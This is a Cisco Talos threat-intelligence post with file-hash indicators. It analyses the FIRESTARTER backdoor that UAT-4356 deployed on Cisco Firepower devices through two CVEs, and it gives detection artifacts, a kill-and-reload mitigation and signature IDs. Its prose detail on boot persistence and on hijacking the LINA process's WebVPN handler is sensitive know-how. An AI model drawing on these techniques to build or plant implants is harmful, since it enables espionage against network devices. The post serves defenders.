SHA256: 5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
MD5: a2cf85d22a54e26794cbc7be16840bb1 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=5e6060df7e8114cb7b412260870efd1dc05979454bd907d8750c669ae6fcbcfe 
Example Filename: a2cf85d22a54e26794cbc7be16840bb1.exe 
Detection Name: W32.5E6060DF7E-100.SBX.TG 

SHA256: 3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc 
MD5: d749e0f8f2cd4e14178a787571534121 
Talos Rep: https://talosintelligence.com/talos_file_reputation?s=3c1dbc3f56e91cc79f0014850e773a7f12bbfef06680f08f883b2bf12873eccc 
Example Filename: KitchenCanvas_753447.exe 
Detection Name: W32.3C1DBC3F56-90.SBX.TG 

Cisco Talos Blog – ​Read More

Cisco Talos is aware of UAT-4356‘s continued active targeting of Cisco Firepower devices’ Firepower eXtensible Operating System (FXOS). UAT-4356 exploited n-day vulnerabilities (CVE-2025-20333 and CVE-2025-20362) to gain unauthorized access to vulnerable devices, where the threat actor deployed their custom-built backdoor dubbed “FIRESTARTER.” FIRESTARTER considerably overlaps with the technical capabilities of RayInitiator’s Stage 3 shellcode that processes incoming XML-based payloads to endpoint APIs.

In early 2024, Cisco Talos attributed ArcaneDoor, a state-sponsored campaign focused on gaining access to network perimeter devices for espionage, to UAT-4356.

Customers are advised to refer to Cisco’s Security Advisory for mitigation and detection guidance, indicators of compromise (IOCs), affected products, and applicable software upgrade recommendations.

---

The FIRESTARTER backdoor

FIRESTARTER is a malicious backdoor implanted by UAT-4356 that allows remote access and control to execute arbitrary code inside the LINA process, a core component of Cisco’s ASA and FTD appliances running FXOS.

Persistence

UAT-4356 established persistence for FIRESTARTER on compromised devices by manipulating the mount list for Cisco Service Platform (CSP), namely “CSP_MOUNT_LIST”, to execute FIRESTARTER. The mount list allows programs and commands to be executed as part of the device’s boot sequence. The persistence mechanism triggers during graceful reboot (i.e., when a process termination signal is received). FIRESTARTER also checks the runlevel for value 6 (indicating device reboot) and in case of a match, writes itself to backup location “/opt/cisco/platform/logs/var/log/svc_samcore.log” and updates the CSP_MOUNT_LIST to copy itself back to “/usr/bin/lina_cs” and then be executed. When FIRESTARTER runs after a reboot, it restores the original CSP_MOUNT_LIST and removes the trojanized copy. Because the runlevel triggers establishment of this transient persistence mechanism, a hard reboot (for example, after the device has been unplugged from power) effectively removes the implant from the device.

FIRESTARTER has used the following commands to establish persistence for itself using the transient persistence mechanism:

When the implant injects itself into the LINA process, it removes the traces of its persistence mechanism by restoring the CSP_MOUNT_LIST from a temporary copy (“CSP_MOUNTLIST.tmp”), then removing the temporary copy and the FIRESTARTER file from disk (“/usr/bin/lina_cs”).

FIRESTARTER’s backdoor capabilities

FIRESTARTER can run arbitrary shellcode received by the device. A pre-defined handler function specified by a hardcoded offset in the LINA process’ memory is replaced by an unauthorized handler routine that parses the data being served to it. FIRESTARTER specifically looks for a WebVPN request XML. If the request data received matches a specific pattern of custom-defined prefixing then the shellcode that immediately follows it is executed in memory. If the prefixing bytes are not found, then the data is treated as regular request data and passed to the original handler function (if any).

FIRESTARTER’s loading mechanism, Stage 2 shellcode (i.e., the actual request handler component), handler function replacement, XML parsing for magic bytes, and final payload execution display considerable overlaps with RayInitiator’s Stage 3 deployment actions and accompanying artifacts.

Injecting and activating the malicious shellcode in LINA

FIRESTARTER first reads the LINA process’ memory to search for and verify the presence of the bytes (long) 0x1, 0x2, 0x3, 0x4, 0x5 at specific locations in memory. If found, FIRESTARTER will then query the process’ memory to find an “r-xp” memory range for the shared library “libstdc++.so”. It then copies the next stage shellcode (Stage 2) to the last 0x200 bytes of the memory region. FIRESTARTER then overwrites an internal data structure in the LINA process’ memory to replace a pointer to a WebVPN-specific, legitimate XML handler function with the address of the malicious Stage 2 shellcode.

The malicious shellcode is triggered as part of the authentication API’s request handling process and parses the incoming request data for magic markers signifying an executable payload. If found, the executable payload is then executed on the compromised device.

---

Detection guidance

The presence of the following artifacts – specifically the filenames “lina_cs” and “svc_samcore.log” – though somewhat brittle indicators, may indicate the presence of the FIRESTARTER on a Firepower device:

• Any output from the commands:
  • show kernel process | include lina_cs
• The presence of the following files on disk:
  • /usr/bin/lina_cs
  • /opt/cisco/platform/logs/var/log/svc_samcore.log

For more comprehensive detection guidance, please refer to Cisco’s Security Advisory here. Please also refer to CISA’s update to V1: Emergency Directive (ED) 25-03: Identify and Mitigate Potential Compromise of Cisco Devices and FIRESTARTER Backdoor Malware Analysis Report for more information and guidance.

 

Mitigation and coverage

We recommend that Cisco customers follow the steps recommended in Cisco’s advisory, with particular attention to any applicable software upgrade recommendations. Organizations impacted can initiate a TAC request for Cisco support.

A FIRESTARTER infection may be mitigated on all affected devices by reimaging the devices.

On Cisco FTD software that is not in lockdown mode, there is also the option of killing the lina_cs process then reloading the device:

> expert
$ sudo kill -9 $(pidof lina_cs)
$ exit
> reload

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover the vulnerabilities CVE-2025-20333 and CVE-2025-20362: 65340, 46897.

Snort rules covering FIRESTARTER: 62949

The following ClamAV signatures detect this threat: Unix.Malware.Generic-10059965-0

Cisco Talos Blog – ​Read More